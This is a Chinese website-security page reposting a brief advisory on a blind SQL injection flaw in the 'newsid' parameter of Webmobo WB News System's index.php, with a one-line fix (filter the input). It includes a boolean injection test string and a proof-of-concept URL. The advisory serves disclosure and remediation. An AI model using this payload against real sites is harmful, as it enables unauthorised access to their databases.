Webmobo WB News System盲注缺陷及修复 - 网站安全

Webmobo WB News System盲注缺陷及修复 - 网站安全 - 自

来源：自学PHP网时间：2015-04-17 14:47 作者：阅读:次

[导读] 标题: Webmobo News System Blind SQL Injection作者: Eyup CELIK www.2cto.com影响版本:所有版本测试版本: All versions are Vulnerability描述Blind SQL Injection can be done using the......

标题: Webmobo News System Blind SQL Injection
作者: Eyup CELIK www.2cto.com
影响版本:所有版本
测试版本: All versions are Vulnerability

描述

Blind SQL Injection can be done using the command input
缺陷页面:
index.php

示例:
index.php?action=sendto&newsid=<Blind SQL Injection Code>

测试方法:
index.php?action=sendto&newsid=1' and '2'='2

POC:

http://www.2cto.com /index.php?action=sendto&newsid=1%27%20and%20%272%27=%272

修复：
过滤index.php页面该参数输入、

致谢：

Eyup CELIK
Information Technology Security Specialist

WordPress插件oQey Gallery<= 0.4.8 SQL注射缺陷及修复

浅谈绕过WAF的数种方法 - 网站安全 - 自学php

子栏目

Webmobo WB News System盲注缺陷及修复 - 网站安全 - 自

最新评论

添加评论

更多文章推荐

添加评论